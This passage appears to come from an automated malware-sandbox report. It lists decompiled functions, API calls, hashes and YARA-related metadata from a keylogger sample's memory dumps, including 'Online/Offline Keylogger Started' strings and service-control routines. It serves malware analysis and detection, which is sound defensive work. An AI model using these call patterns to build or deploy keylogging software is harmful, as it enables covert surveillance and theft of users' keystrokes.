                                    • Instruction Fuzzy Hash: 22E0DF22B00161BB552033BAAC0FD6F7D29DFCAB70B01015EFA0466292CD580902C3F6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00705799, Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                    Download Yara Rule
                                    APIs
                                    • __allrem.LIBCMT ref: 00705926
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00705942
                                    • __allrem.LIBCMT ref: 00705959
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00705977
                                    • __allrem.LIBCMT ref: 0070598E
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007059AC
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
                                    • Instruction ID: 741b86479768827e83b1e59b85b27bc073641e8f79aad9786231157893a360b2
                                    • Opcode Fuzzy Hash: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
                                    • Instruction Fuzzy Hash: 6B81D772A10F16DBE7209A68CC46B6B73E9AF40774F24872AF511D66C1E77CE9408F90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 105C660C, Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E105C660C(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t76;
				intOrPtr _t78;
				signed int _t79;
				void* _t80;
				signed int _t82;
				void* _t83;
				signed int _t85;
				signed int _t91;
				signed int _t100;
				void* _t102;
				signed int _t105;
				signed int* _t108;
				signed int* _t109;
				intOrPtr* _t111;
				signed int _t116;
				signed int _t118;
				signed int _t121;
				void* _t123;
				signed int _t126;
				signed int _t129;
				signed int _t137;
				signed int _t143;
				void _t145;
				void* _t146;
				void* _t148;
				void* _t150;
				signed int _t151;
				signed int _t152;
				void* _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				intOrPtr _t157;

				_t137 = __edx;
				_t153 = _a4;
				if(_t153 == 0) {
					_t111 = E105CB377();
					_t157 = 0x16;
					 *_t111 = _t157;
					E105C77D0();
					return _t157;
				}
				_push(__edi);
				_t121 = 9;
				memset(_t153, _t61 | 0xffffffff, _t121 << 2);
				_t143 = _a8;
				__eflags = _t143;
				if(_t143 == 0) {
					_t109 = E105CB377();
					_t156 = 0x16;
					 *_t109 = _t156;
					E105C77D0();
					_t76 = _t156;
					L12:
					return _t76;
				}
				_push(__ebx);
				__eflags =  *(_t143 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t108 = E105CB377();
						_t155 = 0x16;
						 *_t108 = _t155;
						_t76 = _t155;
						L11:
						goto L12;
					}
					__eflags =  *_t143;
					if( *_t143 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t143 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t143 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				L105D3F11(0, _t143, _t153, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E105D3746( &_v12);
				_pop(_t123);
				__eflags = _t67;
				if(_t67 == 0) {
					_t67 = E105D3772( &_v16);
					_pop(_t123);
					__eflags = _t67;
					if(_t67 == 0) {
						_t67 = E105D379E( &_v8);
						_pop(_t123);
						__eflags = _t67;
						if(_t67 == 0) {
							_t116 =  *(_t143 + 4);
							_t126 =  *_t143;
							__eflags = _t116;
							if(__eflags < 0) {
								L28:
								_push(_t143);
								_push(_t153);
								_t76 = E105CD54A();
								__eflags = _t76;
								if(_t76 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t145 =  *_t153;
								_t118 = _t137;
								if(__eflags == 0) {
									L32:
									_t78 = _v8;
									L33:
									asm("cdq");
									_t146 = _t145 - _t78;
									asm("sbb ebx, edx");
									_t79 = L105E1AE3(_t146, _t118, 0x3c, 0);
									 *_t153 = _t79;
									__eflags = _t79;
									if(_t79 < 0) {
										_t146 = _t146 + 0xffffffc4;
										 *_t153 = _t79 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t80 = L105E1A33(_t146, _t118, 0x3c, 0);
									_t119 = _t137;
									_t28 = _t153 + 4; // 0x848d0045
									asm("cdq");
									_t148 = _t80 +  *_t28;
									asm("adc ebx, edx");
									_t82 = L105E1AE3(_t148, _t137, 0x3c, 0);
									 *(_t153 + 4) = _t82;
									__eflags = _t82;
									if(_t82 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *(_t153 + 4) = _t82 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t83 = L105E1A33(_t148, _t119, 0x3c, 0);
									_t120 = _t137;
									_t31 = _t153 + 8; // 0xa824
									asm("cdq");
									_t150 = _t83 +  *_t31;
									asm("adc ebx, edx");
									_t85 = L105E1AE3(_t150, _t137, 0x18, 0);
									 *(_t153 + 8) = _t85;
									__eflags = _t85;
									if(_t85 < 0) {
										_t150 = _t150 + 0xffffffe8;
										 *(_t153 + 8) = _t85 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t129 = L105E1A33(_t150, _t120, 0x18, 0);
									__eflags = _t137;
									if(__eflags < 0) {
										L48:
										_t44 = _t153 + 0x18; // 0xa024848d
										 *(_t153 + 0xc) =  *(_t153 + 0xc) + _t129;
										asm("cdq");
										_t151 = 7;
										_t51 = _t153 + 0xc; // 0x50506a00
										_t91 =  *_t51;
										 *(_t153 + 0x18) = ( *_t44 + 7 + _t129) % _t151;
										__eflags = _t91;
										if(_t91 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t153 + 0x10)) = 0xb;
										 *(_t153 + 0xc) = _t91 + 0x1f;
										_t55 = _t129 + 0x16d; // 0x16d
										 *(_t153 + 0x1c) =  *(_t153 + 0x1c) + _t55;
										 *((intOrPtr*)(_t153 + 0x14)) =  *((intOrPtr*)(_t153 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t153 + 0x18; // 0xa024848d
											asm("cdq");
											_t152 = 7;
											_t39 = _t153 + 0xc;
											 *_t39 =  *(_t153 + 0xc) + _t129;
											__eflags =  *_t39;
											 *(_t153 + 0x18) = ( *_t34 + _t129) % _t152;
											L43:
											_t42 = _t153 + 0x1c;
											 *_t42 =  *(_t153 + 0x1c) + _t129;
											__eflags =  *_t42;
											L44:
											_t76 = 0;
											goto L11;
										}
										__eflags = _t129;
										if(_t129 == 0) {
											__eflags = _t137;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t129;
											if(_t129 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t153);
								_t100 = L105D3F62(_t118, _t145, _t153, __eflags);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L32;
								}
								_t78 = _v8 + _v16;
								 *((intOrPtr*)(_t153 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t102 = 7;
								__eflags = _t116 - _t102;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t126 - _v8;
									_push(_t153);
									_v20 = _t116;
									_t76 = E105CD54A();
									__eflags = _t76;
									if(_t76 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t76;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t153);
									_t105 = L105D3F62(_t116, _t143, _t153, __eflags);
									__eflags = _t105;
									if(_t105 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t153);
									_t76 = E105CD54A();
									__eflags = _t76;
									if(_t76 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t153 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t126 - 0x933c7b7f;
								if(_t126 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t126 - 0x3f480;
							if(_t126 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E105C77FD(_t67);
				asm("int3");
				_push(_t153);
				_t69 = E105CD4E5(_t123);
				_t154 = _t69;
				__eflags = _t154;
				if(_t154 != 0) {
					_push(_v0);
					_t70 = E105C660C(0, _t137, _t143, _t154);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t154;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}


















































                                    0x105c660c
                                    0x105c6615
                                    0x105c661a
                                    0x105c661c
                                    0x105c6623
                                    0x105c6624
                                    0x105c6626
                                    0x00000000
                                    0x105c662b
                                    0x105c662f
                                    0x105c6637
                                    0x105c6638
                                    0x105c663a
                                    0x105c663d
                                    0x105c663f
                                    0x105c6641
                                    0x105c6648
                                    0x105c6649
                                    0x105c664b
                                    0x105c6650
                                    0x105c6681
                                    0x00000000
                                    0x105c6681
                                    0x105c6654
                                    0x105c6657
                                    0x105c665a
                                    0x105c665c
                                    0x105c6674
                                    0x105c6674
                                    0x105c667b
                                    0x105c667c
                                    0x105c667e
                                    0x105c6680
                                    0x00000000
                                    0x105c6680
                                    0x105c665e
                                    0x105c6660
                                    0x00000000
                                    0x00000000
                                    0x105c6660
                                    0x105c6664
                                    0x105c6665
                                    0x105c6668
                                    0x105c666a
                                    0x00000000
                                    0x00000000
                                    0x105c666c
                                    0x105c6672
                                    0x00000000
                                    0x00000000
                                    0x105c6672
                                    0x105c6687
                                    0x105c668f
                                    0x105c6693
                                    0x105c6696
                                    0x105c6699
                                    0x105c669e
                                    0x105c669f
                                    0x105c66a1
                                    0x105c66ab
                                    0x105c66b0
                                    0x105c66b1
                                    0x105c66b3
                                    0x105c66bd
                                    0x105c66c2
                                    0x105c66c3
                                    0x105c66c5
                                    0x105c66cb
                                    0x105c66ce
                                    0x105c66d0
                                    0x105c66d2
                                    0x105c6753
                                    0x105c6753
                                    0x105c6754
                                    0x105c6755
                                    0x105c675c
                                    0x105c675e
                                    0x00000000
                                    0x00000000
                                    0x105c6764
                                    0x105c676a
                                    0x105c676b
                                    0x105c676d
                                    0x105c676f
                                    0x105c678b
                                    0x105c678b
                                    0x105c678e
                                    0x105c678e
                                    0x105c678f
                                    0x105c6795
                                    0x105c6799
                                    0x105c679e
                                    0x105c67a0
                                    0x105c67a2
                                    0x105c67a7
                                    0x105c67aa
                                    0x105c67ac
                                    0x105c67ac
                                    0x105c67b5
                                    0x105c67bc
                                    0x105c67be
                                    0x105c67c1
                                    0x105c67c2
                                    0x105c67c8
                                    0x105c67cc
                                    0x105c67d1
                                    0x105c67d4
                                    0x105c67d6
                                    0x105c67db
                                    0x105c67de
                                    0x105c67e1
                                    0x105c67e1
                                    0x105c67ea
                                    0x105c67f1
                                    0x105c67f3
                                    0x105c67f6
                                    0x105c67f7
                                    0x105c67fd
                                    0x105c6801
                                    0x105c6806
                                    0x105c6809
                                    0x105c680b
                                    0x105c6810
                                    0x105c6813
                                    0x105c6816
                                    0x105c6816
                                    0x105c6824
                                    0x105c6826
                                    0x105c6828
                                    0x105c6855
                                    0x105c6855
                                    0x105c685b
                                    0x105c6862
                                    0x105c6863
                                    0x105c6866
                                    0x105c6866
                                    0x105c6869
                                    0x105c686c
                                    0x105c686e
                                    0x00000000
                                    0x00000000
                                    0x105c6873
                                    0x105c687a
                                    0x105c687d
                                    0x105c6883
                                    0x105c6886
                                    0x00000000
                                    0x105c682a
                                    0x105c682a
                                    0x105c6830
                                    0x105c6830
                                    0x105c6837
                                    0x105c6838
                                    0x105c683b
                                    0x105c683b
                                    0x105c683b
                                    0x105c683e
                                    0x105c6841
                                    0x105c6841
                                    0x105c6841
                                    0x105c6841
                                    0x105c6844
                                    0x105c6844
                                    0x00000000
                                    0x105c6844
                                    0x105c682c
                                    0x105c682e
                                    0x105c684b
                                    0x105c684d
                                    0x00000000
                                    0x00000000
                                    0x105c684f
                                    0x00000000
                                    0x00000000
                                    0x105c6851
                                    0x105c6853
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x105c6853
                                    0x00000000
                                    0x105c682e
                                    0x105c6828
                                    0x105c6771
                                    0x105c6772
                                    0x105c6778
                                    0x105c677a
                                    0x00000000
                                    0x00000000
                                    0x105c677f
                                    0x105c6782
                                    0x00000000
                                    0x105c6782
                                    0x105c66d4
                                    0x105c66de
                                    0x105c66e0
                                    0x105c66e1
                                    0x105c66e3
                                    0x00000000
                                    0x00000000
                                    0x105c66e5
                                    0x105c66ef
                                    0x105c66f2
                                    0x105c66f8
                                    0x105c66f9
                                    0x105c66fb
                                    0x105c66fe
                                    0x105c66ff
                                    0x105c6702
                                    0x105c6709
                                    0x105c670b
                                    0x00000000
                                    0x00000000
                                    0x105c6711
                                    0x105c6714
                                    0x00000000
                                    0x00000000
                                    0x105c671a
                                    0x105c671b
                                    0x105c6721
                                    0x105c6723
                                    0x00000000
                                    0x00000000
                                    0x105c672c
                                    0x105c672d
                                    0x105c6733
                                    0x105c6734
                                    0x105c6737
                                    0x105c6738
                                    0x105c673f
                                    0x105c6741
                                    0x00000000
                                    0x00000000
                                    0x105c6747
                                    0x00000000
                                    0x105c6747
                                    0x105c66e7
                                    0x105c66ed
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x105c66ed
                                    0x105c66d6
                                    0x105c66dc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x105c66dc
                                    0x105c66c5
                                    0x105c66b3
                                    0x105c688b
                                    0x105c688c
                                    0x105c688d
                                    0x105c688e
                                    0x105c688f
                                    0x105c6890
                                    0x105c6895
                                    0x105c689b
                                    0x105c689c
                                    0x105c68a1
                                    0x105c68a3
                                    0x105c68a5
                                    0x105c68a7
                                    0x105c68ab
                                    0x105c68b3
                                    0x105c68b8
                                    0x105c68b8
                                    0x00000000
                                    0x105c68b8
                                    0x105c68bc

                                    APIs
                                    • __allrem.LIBCMT ref: 105C6799
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C67B5
                                    • __allrem.LIBCMT ref: 105C67CC
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C67EA
                                    • __allrem.LIBCMT ref: 105C6801
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C681F
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 70e43babb6b80f0446183ccc8a4913d0ff470ccdc368e1151db7c4cb29152702
                                    • Instruction ID: d49cdd11bfac7b8b619479a999c2125c9e5a322f0e6642317b1bdba0728c6d14
                                    • Opcode Fuzzy Hash: 70e43babb6b80f0446183ccc8a4913d0ff470ccdc368e1151db7c4cb29152702
                                    • Instruction Fuzzy Hash: 7C81F776A007069BE7149BF8CD85B6ABBECEF88764F11453AF510D6680E774FB4087A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070F14E, Relevance: 9.2, APIs: 6, Instructions: 200COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: 610f84934d2dab88b77d09307504a995a3c4a4e7c94a9deef8044fb604d26232
                                    • Instruction ID: 612f4ceb6315adc1c5b0885da8f5b7af76663847d647c03a4f2f89688181d6bb
                                    • Opcode Fuzzy Hash: 610f84934d2dab88b77d09307504a995a3c4a4e7c94a9deef8044fb604d26232
                                    • Instruction Fuzzy Hash: B151C336900209EBDB349B68CC46BAE77E9BF49330F64433AF914D66C2DB3DD9409664
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D8C71, Relevance: 9.2, APIs: 6, Instructions: 168sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00001388), ref: 006D8C8A
                                      • Part of subcall function 006D8BC0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,006D8C97), ref: 006D8BF6
                                      • Part of subcall function 006D8BC0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,006D8C97), ref: 006D8C05
                                      • Part of subcall function 006D8BC0: Sleep.KERNEL32(00002710,?,?,?,006D8C97), ref: 006D8C32
                                      • Part of subcall function 006D8BC0: CloseHandle.KERNEL32(00000000,?,?,?,006D8C97), ref: 006D8C39
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 006D8CC6
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 006D8CD7
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 006D8CEE
                                    • PathFileExistsW.SHLWAPI(00000000,00000012), ref: 006D8D69
                                      • Part of subcall function 006E79DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E79F9
                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0072F724), ref: 006D8E85
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                    • String ID:
                                    • API String ID: 3795512280-0
                                    • Opcode ID: 6e93a959fa088a6b48d19c3b97cea0430da1c427ceddad8c3707b24972bb8a08
                                    • Instruction ID: ce3a9ddf73c74e5b33c7d649c331dab051aa3b06d61dc6575a7b8b99593539ac
                                    • Opcode Fuzzy Hash: 6e93a959fa088a6b48d19c3b97cea0430da1c427ceddad8c3707b24972bb8a08
                                    • Instruction Fuzzy Hash: 04513071E082016BCB55FB70C8669BF77AB5F96300F04052FF9429B3D2DF689A05879A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00710FE4, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16_free
                                    • String ID: a/p$am/pm
                                    • API String ID: 2936374016-3206640213
                                    • Opcode ID: 5f7bb65ef4c9aecda5c1ac43762c399bc485a2287e6855c50446ade03a2cdfe8
                                    • Instruction ID: 12ad27df29ec396f40817ad780552c59e5a5afccb9fee299d131a47ca180b109
                                    • Opcode Fuzzy Hash: 5f7bb65ef4c9aecda5c1ac43762c399bc485a2287e6855c50446ade03a2cdfe8
                                    • Instruction Fuzzy Hash: 14D1EE31A1025ADACB288F6CC8956FAB7B1FF05700FA44159EB11AF6C5D23D9DC1CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00711CE2, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00705545,?,?,?,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711CE6
                                    • _free.LIBCMT ref: 00711D19
                                    • _free.LIBCMT ref: 00711D41
                                    • SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D4E
                                    • SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D5A
                                    • _abort.LIBCMT ref: 00711D60
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: aa6c2f52d4e69ef023ad8804beaa1a33fa8c2aed141a8f0eda269a75862f806d
                                    • Instruction ID: 7e47d5945be1cb415e4a3dc9d6ab96a8249c8e9438da5eb060242d13bef4f060
                                    • Opcode Fuzzy Hash: aa6c2f52d4e69ef023ad8804beaa1a33fa8c2aed141a8f0eda269a75862f806d
                                    • Instruction Fuzzy Hash: 7EF08C3A340601E7D322237CBC0EEDE22799BD2761B654225F7589A1E2EE7C898241A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E640B, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E641A
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E642E
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E643B
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E644A
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E645C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E645F
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 259977478fbf1b5431c95a41eb24ed11b1e617d6c4a37b741486acab46c162b8
                                    • Instruction ID: e9e577e2909a734b380da2dac0ec2b4e1d30cfef472eed2a850591061c269c4e
                                    • Opcode Fuzzy Hash: 259977478fbf1b5431c95a41eb24ed11b1e617d6c4a37b741486acab46c162b8
                                    • Instruction Fuzzy Hash: B4F0C2316412187BD230AB65AC49DBF3BAEDB45690B004016FD0586141EE6C8E0696B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E6576, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E6585
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E6599
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E65A6
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E65B5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E65C7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E65CA
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 0a2a29b0af36edb14035973d20e222ca4910a5a43a4588b88d9adeea8adfc6bd
                                    • Instruction ID: c83dced0227ce83341327c88e86616e5a78fc25c626305df571631dac934dd2b
                                    • Opcode Fuzzy Hash: 0a2a29b0af36edb14035973d20e222ca4910a5a43a4588b88d9adeea8adfc6bd
                                    • Instruction Fuzzy Hash: A9F0F6316412187BD230AB65EC49EBF3B6EDB45290F00401AFE0996141EF7C8F069AF8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006EBD19, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 174COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _strncpy
                                    • String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
                                    • API String ID: 2961919466-1012175531
                                    • Opcode ID: e3cf5d9f82e42301d7ceb7935bcd58d37448f6b9ab2d364eccda954a63fa7032
                                    • Instruction ID: 00876d654f95d7bef4a5de3b8d4e687bf6760322d0bb247283228c4042073bb5
                                    • Opcode Fuzzy Hash: e3cf5d9f82e42301d7ceb7935bcd58d37448f6b9ab2d364eccda954a63fa7032
                                    • Instruction Fuzzy Hash: F8515735D06389DBDF20CEA58885BFFBBB69F40340F185569D940A7386E3758D02CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D8742, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32 ref: 006D87CA
                                    • CreateThread.KERNEL32 ref: 006D87DA
                                    • CreateThread.KERNEL32 ref: 006D87E6
                                      • Part of subcall function 006D9634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0073C350), ref: 006D9642
                                      • Part of subcall function 006D9634: wsprintfW.USER32 ref: 006D96C3
                                      • Part of subcall function 006D9634: SetEvent.KERNEL32(00000000,00000000), ref: 006D96ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$EventLocalTimewsprintf
                                    • String ID: Offline Keylogger Started$[Info]
                                    • API String ID: 3534694722-3531117058
                                    • Opcode ID: a09dcc1baacbd33252152e0cd4827696e48895c8cbc1a35bd2bcb75b6bd6a3c8
                                    • Instruction ID: 0f0a05e3cf296f1a2e3f6b85a996b5b213a4749b4b2bdd828bba83f083a6a1e0
                                    • Opcode Fuzzy Hash: a09dcc1baacbd33252152e0cd4827696e48895c8cbc1a35bd2bcb75b6bd6a3c8
                                    • Instruction Fuzzy Hash: AF11E7A19002087ED210B6799C8ACBF7A5EDA92394B40052EF94553392DD645E04C6FA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D93AD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65threadCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006D9634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0073C350), ref: 006D9642
                                      • Part of subcall function 006D9634: wsprintfW.USER32 ref: 006D96C3
                                      • Part of subcall function 006D9634: SetEvent.KERNEL32(00000000,00000000), ref: 006D96ED
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                    • CreateThread.KERNEL32 ref: 006D942D
                                    • CreateThread.KERNEL32 ref: 006D9439
                                    • CreateThread.KERNEL32 ref: 006D9445
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTime$Eventwsprintf
                                    • String ID: Online Keylogger Started$[Info]
                                    • API String ID: 3546759147-3401407043
                                    • Opcode ID: 1b6b687c1e1fa9a087bfb916ed99e38717a90b5dd4ccbc1a61fb7f217ad0bd57
                                    • Instruction ID: 19aac5d06dd3bedafa6d152f44372eaf5f126b7c1060d85e5ec6e6b084cb4e8b
                                    • Opcode Fuzzy Hash: 1b6b687c1e1fa9a087bfb916ed99e38717a90b5dd4ccbc1a61fb7f217ad0bd57
                                    • Instruction Fuzzy Hash: 7A01D6A1F012593EE62076758C9BDBF7A6FCA96794F80006EFA8113343DD641C0683F6
                                    Uniqueness

